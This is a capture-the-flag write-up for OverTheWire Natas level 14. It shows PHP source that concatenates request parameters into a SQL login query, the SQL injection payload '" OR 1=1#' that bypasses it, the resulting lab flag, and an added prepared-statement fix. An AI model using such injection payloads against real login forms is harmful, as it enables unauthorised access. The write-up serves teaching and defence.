[OverTheWire] Natas – Level 14

http://natas14.natas.labs.overthewire.org/

Click View sourcecode:

[php]');
    mysql_select_db('natas14', $link);

    // Both request parameters are concatenated into the SQL string without escaping
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        // Adding ?debug to the URL echoes the final query text
        echo "Executing query: $query\n";
    }

    // Any returned row counts as a successful login
    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
        echo "Successful login! The password for natas15 is \n";
    } else {
        echo "Access denied!\n";
    }
    mysql_close($link);
} else {
?>[/php]

It is immediately clear that neither username nor password is escaped before being placed in the query. Inject with the textbook payload:

username = " OR 1=1#
password = <anything>

Result:

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

→ flag = AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J.
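The fix for the concatenated query above, as an added example that is not part of the original write-up or the Natas source: the page's string building is reproduced only to print the SQL text it yields, next to a prepared statement that binds the same input as data. Assumptions: an in-memory SQLite database opened through PDO stands in for the level's MySQL server, and the table contents and the function names `build_query_concat` and `login_prepared` are constructed for this illustration.

```php
<?php
// Added example. Constructed table and credentials, not the real natas14 data.
// Assumption: in-memory SQLite via PDO stands in for the level's MySQL server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-sample-pw')");

// Hypothetical helper: builds the query text the way the level's source does,
// so the effect of a double quote in the input can be read off the output.
function build_query_concat(string $username, string $password): string
{
    return "SELECT * from users where username=\"" . $username
         . "\" and password=\"" . $password . "\"";
}

// Hypothetical helper, hardened form: the SQL text is fixed at prepare time
// and the request values are sent separately as bound parameters.
function login_prepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT 1 FROM users WHERE username = :u AND password = :p LIMIT 1'
    );
    $stmt->execute([':u' => $username, ':p' => $password]);
    return $stmt->fetchColumn() !== false;   // false means no matching row
}

$payload = '" OR 1=1#';   // the username value used in the write-up

// Concatenation: the quote in the input closes the string literal, so the
// remainder of the input becomes part of the SQL statement itself.
echo build_query_concat($payload, 'x'), PHP_EOL;

// Prepared statement: the same input is only ever compared as a string value.
var_dump(login_prepared($db, $payload, 'x'));
var_dump(login_prepared($db, 'alice', 'constructed-sample-pw'));
var_dump(login_prepared($db, 'alice', 'wrong'));
```

The `mysql_*` functions in the level's source were removed in PHP 7; both PDO and mysqli provide prepared statements for MySQL.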
